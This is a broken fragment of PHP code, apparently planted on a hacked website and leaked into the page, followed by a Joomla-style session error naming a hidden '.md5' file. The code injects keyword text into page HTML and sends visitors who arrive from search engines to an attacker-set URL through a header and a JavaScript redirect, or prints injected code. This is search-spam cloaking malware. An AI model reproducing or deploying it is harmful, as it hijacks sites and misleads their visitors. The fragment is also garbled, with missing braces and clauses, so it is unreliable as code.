#iUs', "
", $my_content, 1);
elseif (@preg_match('##iUs', $my_content)) {
$my_content = preg_replace('##iUs', "\n
", $my_content, 1);
} //end if key
elseif (!preg_match('#
(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) {
foreach($el as $ln) {
if (preg_match('#<strong>#', $my_content)) {
$my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1);
elseif (preg_match('#<b>#', $my_content)) {
$my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1);
elseif (preg_match('#<i>#', $my_content)) {
$my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1);
elseif (preg_match('#<u>#', $my_content)) {
$my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1);
elseif (preg_match('#<p(.*)>#', $my_content)) {
$my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1);
elseif (preg_match('#</p>#', $my_content)) {
$my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1);
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$my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1);
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$my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1);
elseif (preg_match('#<body(.*)>#iUs', $my_content)) {
$my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1);
$my_content = str_replace('_-', '<', $my_content);
$my_content = str_replace('-_', '>', $my_content);
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echo $my_content;
if (($_GET[$qq] || $cldw) && $fromse && !$abt) {
if (!$redcode && !$morda) {
if ($key) $tkey = str_replace(' ', '+', $key);
else $tkey = str_replace('-', '+', $_GET[$qq]);
if (strstr($redir, '?')) $redir .= "&keyword=".$tkey;
else $redir .= "?keyword=".$tkey;
$redir = str_replace('KEY', $tkey, $redir);
header("Location: $redir");
echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>";
elseif (!$morda) {
$key = str_replace('-', ' ', $_GET[$qq]);
$redcode = str_replace('KEY', $key, $redcode);
echo stripslashes($redcode);
?>Error displaying the error page: Application Instantiation Error: Failed to start the session because headers have already been sent by "/home/vts-zr/public_html/C:/.md5" at line 76.